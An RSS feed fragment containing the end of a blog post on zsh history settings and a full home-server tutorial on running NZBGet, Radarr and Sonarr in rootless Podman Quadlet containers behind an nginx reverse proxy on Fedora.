Really cool pattern! Using a comment &lt;code&gt;#&lt;/code&gt; wouldn’t have worked because that
would comment out the commend too.&lt;/p&gt;&lt;h5&gt;Viewing your extended history:&lt;/h5&gt;&lt;ul&gt;&lt;li&gt;&lt;code&gt;history&lt;/code&gt;: Show your history like usual&lt;/li&gt;&lt;li&gt;&lt;code&gt;history -i&lt;/code&gt;: Show your history with timestamps&lt;/li&gt;&lt;li&gt;&lt;code&gt;history -D&lt;/code&gt;: Show your history with duration&lt;/li&gt;&lt;li&gt;&lt;code&gt;history -iD&lt;/code&gt;: Show your history with both timestamps and duration&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;If time is something you want to filter on you can run &lt;code&gt;history -i 1&lt;/code&gt; to show
all of your history with timestamps.&lt;/p&gt;&lt;p&gt;You can do things like &lt;code&gt;history -i 1 | fzf&lt;/code&gt; to fuzzy search it in fzf or
&lt;code&gt;history -i 1 | grep 2026-06-&lt;/code&gt; to filter out history items for a specific month.&lt;/p&gt;&lt;h3&gt;#
INC_APPEND_HISTORY_TIME&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt INC_APPEND_HISTORY_TIME # Immediately append commands and track duration.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As soon as your command finishes running, it’ll get written out along with how
long it took to run. Knowing the duration is a quality of life enhancement.&lt;/p&gt;&lt;p&gt;With that said, if you have 2 terminals open (A and B), if you run a command in
terminal A, its history won’t be automatically be put into terminal B’s
history. If you want A’s history in B right now you can run &lt;code&gt;fc -IR&lt;/code&gt; in B.
That’ll load all commands from your history file (&lt;code&gt;-R&lt;/code&gt;) that aren’t already
loaded (&lt;code&gt;-I&lt;/code&gt;) in your current shell on demand.&lt;/p&gt;&lt;h3&gt;#
HIST_IGNORE_ALL_DUPS&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt HIST_IGNORE_ALL_DUPS # Never add duplicate entries.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s say you run &lt;code&gt;whoami&lt;/code&gt; 2 times. On the first command, it will get appended
to your history. On the second command, zsh will notice it already exists,
delete all instances of it and append it to end of your history. This way you
always end up with the latest time you ran that command with the latest
timestamp.&lt;/p&gt;&lt;p&gt;The uniqueness check is on the full command with all arguments. For example
&lt;code&gt;echo hello&lt;/code&gt; and &lt;code&gt;echo world&lt;/code&gt; will produce 2 entries.&lt;/p&gt;&lt;p&gt;This means unique &lt;code&gt;cd&lt;/code&gt; paths will be included which is handy since their
arguments are different. I often run &lt;code&gt;cd&lt;/code&gt; then press &lt;code&gt;CTRL+r&lt;/code&gt; and use fzf to
narrow down paths. I’ve written about &lt;a href=&quot;https://nickjanetakis.com/blog/hooking-up-fzf-with-zsh-tab-complete-and-filtering-related-history&quot;&gt;this pattern&lt;/a&gt; before.&lt;/p&gt;&lt;h3&gt;#
HIST_IGNORE_SPACE&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt HIST_IGNORE_SPACE # Ignore commands that start with a space.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I love this setting. It lets you run 1 off commands you don’t want saved to
your history by starting the command with 1 or more spaces.&lt;/p&gt;&lt;p&gt;This could be a long multi-line shell script to test something that you don’t
want cluttering your history or anything you want. Maybe it’s a file path that
contains private information (client information, etc.).&lt;/p&gt;&lt;h3&gt;#
HIST_REDUCE_BLANKS&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt HIST_REDUCE_BLANKS # Remove unnecessary blank lines.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This helps keep your history clean by squishing multiple adjacent spaces into 1
space. It also removes trailing whitespace and other unimportant blank
characters.&lt;/p&gt;&lt;p&gt;These are only the settings I use. You can check &lt;a href=&quot;https://zsh.sourceforge.io/Doc/Release/Options.html#History&quot;&gt;Zsh’s manual for shell
history&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;The video below covers some of these being used in a terminal.&lt;/p&gt;&lt;h3&gt;#
Demo Video&lt;/h3&gt;&lt;h4&gt;Timestamps&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;0:36 – HISTFILE&lt;/li&gt;&lt;li&gt;1:31 – HISTSIZE / SAVEHIST&lt;/li&gt;&lt;li&gt;4:27 – EXTENDED_HISTORY&lt;/li&gt;&lt;li&gt;8:01 – INC_APPEND_HISTORY_TIME&lt;/li&gt;&lt;li&gt;9:37 – HIST_IGNORE_ALL_DUPS&lt;/li&gt;&lt;li&gt;11:16 – HIST_IGNORE_SPACE&lt;/li&gt;&lt;li&gt;13:00 – HIST_REDUCE_BLANKS&lt;/li&gt;&lt;li&gt;13:39 – The manual has more options&lt;/li&gt;&lt;li&gt;14:00 – Sharing your history between terminals&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;How do you have your zsh history configured? Let me know below.&lt;/strong&gt;&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Installing NZBGet, Radarr, and Sonarr on Rootless Podman and Quadlet</title>
<link>https://matt3o.com/installing-nzbget-radarr-and-sonarr-on-rootless-podman-and-quadlet/</link>
<enclosure type="image/jpeg" length="0" url="https://matt3o.com/installing-nzbget-radarr-and-sonarr-on-rootless-podman-and-quadlet/podman.jpg"></enclosure>
<guid isPermaLink="false">jQjair3q6H_rDPMNBbeJFBiGokUAZl1vx8Shvg==</guid>
<pubDate>Thu, 18 Jun 2026 09:26:32 +0000</pubDate>
<description>Time for some geeking out. I’m one of those fools who like to run their own local server with not cloud shenanigans. I’ve been running an Ubuntu server for a while with a bunch of individually installed services, but I wanted to try something more compartmentalized, easier to maintain and update. The obvious choice would have been Docker, but I like to make my life complicated so I installed Fedora with the plan of using Podman with Quadlet.\n</description>
<content:encoded>&lt;p&gt;Time for some geeking out. I’m one of those fools who like to run their own local server with not cloud shenanigans. I’ve been running an Ubuntu server for a while with a bunch of individually installed services, but I wanted to try something more compartmentalized, easier to maintain and update. The obvious choice would have been Docker, but I like to make my life complicated so I installed Fedora with the plan of using &lt;strong&gt;Podman with Quadlet&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;This post is mostly a note-to-self so I have some documentation of the process next time I need to reinstall everything.&lt;/p&gt;&lt;p&gt;I assume you already have Fedora (44 in my case) and podman installed. The first thing to do is to create the &lt;code&gt;*.containers&lt;/code&gt; directory in your home for quadlet to use:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir -p ~/.config/containers/systemd&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;nzbget, radarr and sonarr all need to talk in the same network, so we need to create a custom network for them. This is something I haven’t seen mentioned in other tutorials, but without this step I wasn’t able to get them to communicate properly.&lt;/p&gt;&lt;p&gt;In the directory we just created, add a file called &lt;code&gt;~/.config/containers/systemd/arr.network&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Network]
NetworkName=arr_net&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After a recent update, the DNS resolution inside the containers wasn’t working anymore, if you have the same issue you can also add the following lines to the file:&lt;/p&gt;&lt;p&gt;Next we need the volumes for the containers. I have a big storage drive mounted at &lt;code&gt;/mnt/storage&lt;/code&gt; where I keep all my media and related files, so I created the following directories:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir -p /mnt/storage/media/{nzbget,radarr,sonarr,downloads,Movies,TV}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Remember that we are creating a rootless setup, so we need to make sure that the user running the containers is the same as the owner of the files and directories; in my case is &lt;code&gt;matteo&lt;/code&gt;.&lt;/p&gt;&lt;h2&gt;NZBGet
&lt;/h2&gt;&lt;p&gt;Now we start configuring the actual containers. First NZBGet. Create a file called &lt;code&gt;~/.config/containers/systemd/nzbget.container&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Unit]
Description=NZBGet
After=network-online.target

[Container]
Image=ghcr.io/nzbgetcom/nzbget:latest
ContainerName=nzbget

# Environment variables
Environment=PUID=0
Environment=PGID=0
Environment=TZ=Europe/Rome

# Ports and Volumes
Network=arr.network
PublishPort=6789:6789
Volume=/mnt/storage/media/nzbget:/config:Z
Volume=/mnt/storage/media/downloads:/downloads:z

# This enables automatic updates
AutoUpdate=registry

[Service]
Restart=always
TimeoutStartSec=900

[Install]
WantedBy=default.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The file is pretty basic, the only thing to note is that we are using the custom network we created before (&lt;code&gt;Network=arr.network&lt;/code&gt;)and that we are mounting the volumes with &lt;code&gt;:Z&lt;/code&gt; and &lt;code&gt;:z&lt;/code&gt; options to make sure SELinux doesn’t get in the way. It’s important to note the difference between uppercase and lowercase &lt;code&gt;Z&lt;/code&gt; here, the former will allow only the container to access the volume, while the latter will allow other processes on the host to access it as well. Of course we want the &lt;code&gt;downloads&lt;/code&gt; volume to be accessible from radarr and sonarr, so we use &lt;code&gt;:z&lt;/code&gt; (lowercase) for that one.&lt;/p&gt;&lt;p&gt;Also note that we are setting &lt;code&gt;PUID&lt;/code&gt; and &lt;code&gt;PGID&lt;/code&gt; to &lt;code&gt;0&lt;/code&gt;. In a perfect world we would want to set these to the actual user and group IDs (eg: 1000), and then use &lt;code&gt;podman unshare chown&lt;/code&gt; to change the ownership of the directory &lt;code&gt;/mnt/storage/media&lt;/code&gt;. That totally works but doing so I can’t access the files and directories directly from the host without using &lt;code&gt;sudo&lt;/code&gt;. Setting &lt;code&gt;PUID&lt;/code&gt; and &lt;code&gt;PGID&lt;/code&gt; to &lt;code&gt;0&lt;/code&gt; might not be ideal but it seems to work. Let me know if you have a better solution for this. Remember that setting them to &lt;code&gt;0&lt;/code&gt; in a non-root environment doesn’t give the container root privileges, so it shouldn’t be a security issue.&lt;/p&gt;&lt;p&gt;Let’s give nzbget a try before moving on to the other containers. Run the following command to start it:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user daemon-reload
systemctl --user start nzbget&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If everything went well you should be able to access the nzbget web interface at &lt;code&gt;http://[server-ip]:6789&lt;/code&gt; and log in with the default credentials (&lt;code&gt;admin:tegbzn6789&lt;/code&gt;). At this point you should ensure that nzbget is using the correct paths, and of course you’ll need a news server.&lt;/p&gt;&lt;p&gt;Under &lt;strong&gt;settings &amp;gt; security&lt;/strong&gt; make sure to set &lt;strong&gt;ControlIP&lt;/strong&gt; to &lt;code&gt;0.0.0.0&lt;/code&gt;, and resolve any other issues outlined in the &lt;strong&gt;messages&lt;/strong&gt; section.&lt;/p&gt;&lt;h2&gt;Lingering
&lt;/h2&gt;&lt;p&gt;We also want to start nzbget automatically on boot. By default, rootless &lt;code&gt;systemd --user&lt;/code&gt; sessions only start when a user logs in and tear down upon logout. To force the system to initialize your specific user session at boot, we need “lingering” enabled. Run this command with administrative privileges:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo loginctl enable-linger $USER&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2&gt;Radarr and Sonarr
&lt;/h2&gt;&lt;p&gt;Okay, time to move on to radarr. Create a file called &lt;code&gt;~/.config/containers/systemd/radarr.container&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Unit]
Description=Radarr
After=network-online.target

[Container]
Image=lscr.io/linuxserver/radarr:latest 
ContainerName=radarr

Environment=PUID=0
Environment=PGID=0
Environment=TZ=Europe/Rome

Network=arr.network
PublishPort=7878:7878
Volume=/mnt/storage/media/radarr:/config:Z
Volume=/mnt/storage/media/downloads:/downloads:z
Volume=/mnt/storage/media/Movies:/movies:z

AutoUpdate=registry

[Service]
Restart=always
TimeoutStartSec=900

[Install]
WantedBy=default.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The configuration is pretty much the same as nzbget, we just need to change the image, the container name, the ports and the volumes. The important thing is that we are using the same custom network (&lt;code&gt;Network=arr.network&lt;/code&gt;) so that radarr can talk to nzbget. Same as before note the use of &lt;code&gt;:Z&lt;/code&gt; and &lt;code&gt;:z&lt;/code&gt; for the volumes.&lt;/p&gt;&lt;p&gt;And finally sonarr. Create a file called &lt;code&gt;~/.config/containers/systemd/sonarr.container&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Unit]
Description=Sonarr
After=network-online.target

[Container]
Image=ghcr.io/linuxserver/sonarr:latest 
ContainerName=sonarr

Environment=PUID=0
Environment=PGID=0
Environment=TZ=Europe/Rome

Network=arr.network
PublishPort=8989:8989  
Volume=/mnt/storage/media/sonarr:/config:Z
Volume=/mnt/storage/media/downloads:/downloads:z
Volume=/mnt/storage/media/TV:/tv:z

AutoUpdate=registry

[Service]
Restart=always
TimeoutStartSec=900

[Install]
WantedBy=default.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now start both radarr and sonarr with the same commands we used for nzbget:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user daemon-reload
systemctl --user start radarr
systemctl --user start sonarr&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If everything went well you should be able to access the web interfaces at &lt;code&gt;http://[server-ip]:7878&lt;/code&gt; for radarr and &lt;code&gt;http://[server-ip]:8989&lt;/code&gt; for sonarr. You can then configure them to use the correct paths, and of course set up the indexers and the connection to nzbget.&lt;/p&gt;&lt;p&gt;When creating a new Download Client in radarr and sonarr, make sure to &lt;strong&gt;use the actual IP address of the server&lt;/strong&gt; (eg: &lt;code&gt;192.168.1.2&lt;/code&gt;). &lt;em&gt;localhost&lt;/em&gt; or &lt;em&gt;127.0.0.1&lt;/em&gt; &lt;strong&gt;won’t work&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Congratulations, you now have nzbget, radarr and sonarr running in rootless podman containers that start on boot. To have it also update automatically we need one more step.&lt;/p&gt;&lt;h2&gt;Automatic Updates
&lt;/h2&gt;&lt;p&gt;Thanks to the &lt;code&gt;AutoUpdate=registry&lt;/code&gt;, all containers are already configured to update automatically when a new image is available on the registry, but we need to enable the &lt;code&gt;podman-auto-update.timer&lt;/code&gt; systemd timer to make it work considering my server is always on.&lt;/p&gt;&lt;p&gt;Run the following command:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user enable --now podman-auto-update.timer&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That’s it, now your containers will be automatically updated when a new image is available. You can check the status of the timer with:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;systemctl --user status podman-auto-update.timer&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s not technically recommended to have automatic updates, basically if it works, don’t touch it. But I like to live on the edge and I can always roll back to a previous image if something breaks.&lt;/p&gt;&lt;h2&gt;Bonus: Reverse Proxy with nginx
&lt;/h2&gt;&lt;p&gt;Everything seems to be working, but I want to access the services with nice URLs like &lt;code&gt;http://nzbget.cool.domain&lt;/code&gt; instead of &lt;code&gt;http://192.168.1.2:6789&lt;/code&gt;. To do that I set up a reverse proxy with nginx. It’s pretty straightforward, but –again– SELinux can be a bit of a pain.&lt;/p&gt;&lt;p&gt;I’m already running a full authoritative DNS server with &lt;code&gt;unbound&lt;/code&gt; so it’s easy for me to redirect custom domains to my server IP, but you can achieve the same result in multiple ways (like editing your &lt;code&gt;hosts&lt;/code&gt; file or using a different DNS server or even PI-Hole).&lt;/p&gt;&lt;p&gt;For unbound I added the following lines to my configuration:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-conf&quot;&gt;...
local-zone: &amp;quot;cool.domain.&amp;quot; static
local-data: &amp;quot;nzbget.cool.domain. IN A 192.168.1.2&amp;quot;
local-data: &amp;quot;radarr.cool.domain. IN A 192.168.1.2&amp;quot;
local-data: &amp;quot;sonarr.cool.domain. IN A 192.168.1.2&amp;quot;
...
local-data-ptr: &amp;quot;192.168.1.2 nzbget.cool.domain.&amp;quot;
local-data-ptr: &amp;quot;192.168.1.2 radarr.cool.domain.&amp;quot;
local-data-ptr: &amp;quot;192.168.1.2 sonarr.cool.domain.&amp;quot;
...&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Then I installed and enabled nginx with:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;sudo dnf install nginx
sudo systemctl --now enable nginx&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We also need to relax SELinux to allow nginx to make outbound connections. Run the following command:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo setsebool -P httpd_can_network_connect 1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Since we are at it I also created a self signed SSL certificate for the domain so I can access the services over HTTPS. To do that I ran the following command:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;openssl req -x509 -newkey rsa:4096 -sha512 -days 3650 -noenc -keyout cool.domain.key -out cool.domain.crt -subj &amp;quot;/CN=cool.domain&amp;quot; -addext &amp;quot;subjectAltName=DNS:cool.domain,DNS:*.cool.domain,IP:192.168.1.2&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Of course change &lt;code&gt;cool.domain&lt;/code&gt; (can be anything, even made up) with your actual domain and &lt;code&gt;192.168.1.2&lt;/code&gt; with your server IP. That will generate a certificate valid for 10 years, copy the .crt and .key files to a sensible location (eg: &lt;code&gt;/etc/nginx/certs/&lt;/code&gt;) and then inform SELinux about the new files with:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;sudo restorecon -Rv /etc/nginx/certs&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally we can create the nginx configuration for the reverse proxy. Create a file called &lt;code&gt;proxy.conf&lt;/code&gt; in &lt;code&gt;/etc/nginx/conf.d/&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-nginx&quot;&gt;server {
    listen 80;
    server_name nzbget.cool.domain;
    return 301 https://$host$request_uri;
}

server {
    listen       443 ssl;
    listen       [::]:443 ssl;
    http2        on;
    server_name  nzbget.cool.domain;

    ssl_certificate &amp;quot;/etc/nginx/certs/cool.domain.crt&amp;quot;;
    ssl_certificate_key &amp;quot;/etc/nginx/certs/cool.domain.key&amp;quot;;
    ssl_session_cache shared:SSL:1m;
    ssl_session_timeout  10m;
    ssl_ciphers PROFILE=SYSTEM;
    ssl_prefer_server_ciphers on;

    location / {
        proxy_pass http://127.0.0.1:6789;

        # Pass correct headers to NZBGet
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;

        # Allow large file uploads via the web UI if necessary
        client_max_body_size 100M;
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Repeat the same for radarr and sonarr, just changing the &lt;code&gt;server_name&lt;/code&gt; and the port in &lt;code&gt;proxy_pass&lt;/code&gt;. Reload nginx and you should be able to access the services with the nice URLs we set up.&lt;/p&gt;&lt;h2&gt;Conclusion
&lt;/h2&gt;&lt;p&gt;I’m not sure if this is the best way to set everything up but seems to be working fine for me. I especially like that I don’t need to change the permission on the shared volumes and my main user still has read/write access to the media files. I also have an NFS partition mounted using the same user and group so everything is integrated seamlessly.&lt;/p&gt;&lt;p&gt;If you have any suggestions or improvements drop me a &lt;a href=&quot;https://matt3o.com/about/&quot;&gt;message&lt;/a&gt; or find me on &lt;a href=&quot;https://mastodon.social/@cubiq&quot;&gt;Mastodon&lt;/a&gt; or &lt;a href=&quot;https://discord.gg/matt3o&quot;&gt;Discord&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
</channel>
</rss>
